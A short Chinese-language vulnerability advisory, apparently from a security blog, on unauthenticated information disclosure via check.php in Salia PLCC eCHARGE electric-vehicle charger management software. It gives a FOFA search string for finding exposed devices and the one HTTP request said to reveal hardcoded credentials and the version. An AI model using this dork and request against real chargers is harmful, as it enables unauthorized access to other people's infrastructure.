Salia PLCC check.php 未授权访问致信息泄露


漏洞简介

Salia PLCC 的 eCHARGE 系列提供适用于家庭、企业和公共场所的智能电动汽车充电解决方案,具备高效充电、动态负载管理和光伏系统集成等功能的充电站。其充电管理系统 check.php 存在信息泄露漏洞,未授权攻击者可利用该漏洞获取系统敏感信息。

影响版本

2.2.0(最新版)

fofa语法

"Salia PLCC"

漏洞分析

漏洞复现

GET /check.php HTTP/1.1
Host: salia.mrxn.net

比如硬编码的账户和密码

版本号


手机扫码阅读

Salia PLCC firmware.php 任意文件上传漏洞

银达汇智智慧综合管理平台 PPlugList.ashx SQL注入漏洞

评 论